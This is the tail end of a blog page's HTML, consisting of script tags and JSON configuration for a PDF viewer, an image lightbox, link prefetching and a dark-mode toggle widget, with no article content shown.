  <script class="next-config" data-name="pdf" type="application/json">{"object_url":{"url":"https://cdnjs.cloudflare.com/ajax/libs/pdfobject/2.2.12/pdfobject.min.js","integrity":"sha256-g2xji1rlE3KsGVClvuxTbcR0Kn2+wtQADSff2Tbb4zA="},"url":"/lib/pdf/web/viewer.html"}</script>
  <script src="/js/third-party/tags/pdf.js"></script>



  <script src="/js/third-party/fancybox.js"></script>



  




  <script src="https://cdnjs.cloudflare.com/ajax/libs/quicklink/2.3.0/quicklink.umd.js" integrity="sha256-yvJQOINiH9fWemHn0vCA5lsHWJaHs6/ZmO+1Ft04SvM=" crossorigin="anonymous"></script>
  <script class="next-config" data-name="quicklink" type="application/json">{"enable":true,"home":"ture","archive":true,"delay":true,"timeout":3000,"priority":true,"url":"https://gaifagafin.top/2023/11/27/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94front/"}</script>
  <script src="/js/third-party/quicklink.js"></script>
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '32px',
  right: 'unset',
  left: '32px',
  time: '0.3s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: true,
  label: '🌓',
  autoMatchOsTheme: true
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
</script>

</body>
</html>
